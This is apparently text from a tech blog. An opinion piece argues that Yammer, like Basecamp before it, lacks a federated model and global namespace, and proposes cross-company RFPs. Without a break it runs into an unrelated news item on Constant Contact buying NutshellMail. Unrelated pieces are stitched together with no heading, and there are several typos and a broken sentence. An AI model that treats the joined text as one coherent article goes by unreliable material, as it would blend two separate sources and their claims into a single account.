At any rate, Jason and company are well-known for rejecting new features, but this is more than that, this is a fundamental need that should have been forseen from the start. And, in a way, it's just another indicator of the success that the product enjoys.

When I wrote that in March 2006 it led to an argument with Jason Fried of 37signals, who basically said I was an edge case. I pointed out that success would lead to more of this sort of use -- individuals working with many project groups in many companies. I said he would have to fix this falw, and years later they hacked an afterthought onto Basecamp to make it easier to switch accounts.

Yammer is headed down the sam cul-de-sac. This is a bad move, and one that irks me personally since I sketched out a vision of federated businesses collaborating through Yammer a year ago to the CEO, David Sachs. Obviously, I didn't make the case persuasively enough.

Consider this idea. Imagine tens of thousands of companies that are managing work using a service like Yammer. Imagine if a company, AdjectiveNoun, could post a request for proposal, and distribute that to all companies and individuals that are following the company. Responses to the RFP could be directed to a defined context in AdjectiveNoun's Yammer implementation, and would be streamed to AdjectiveNoun staff.

I think this is a breakthrough idea, and the first company to do this well will explode.

But you can't get there without a federated model of work, and a global namespace. So Yammer is going to ultimately unjigger this mess they are creating. Probably not until some upstart comes along to upset things.

Maybe I'll see one this week at Techcrunch Disrupt, who knows?

Email marketing company Constant Contact has acquired NutshellMail, a FbFund-backed startup that provides an innovative web-based service that lets users send and receive your messages from social networks, such as Facebook, LinkedIn, MySpace and Twitter, in your email inbox.

Founded in 2007, NutshellMail was one of twenty startups incubated within the 2009 class of fbFund REV, Facebook’s joint program with Accel Partners and Founders Fund aimed to help foster quality applications on Facebook Platform.

Constant Contact will use Nutshell to compliment its email marketing, event marketing, and online survey tools for small businesses and nonprofit Constant Contact also announced it will open a Bay Area office.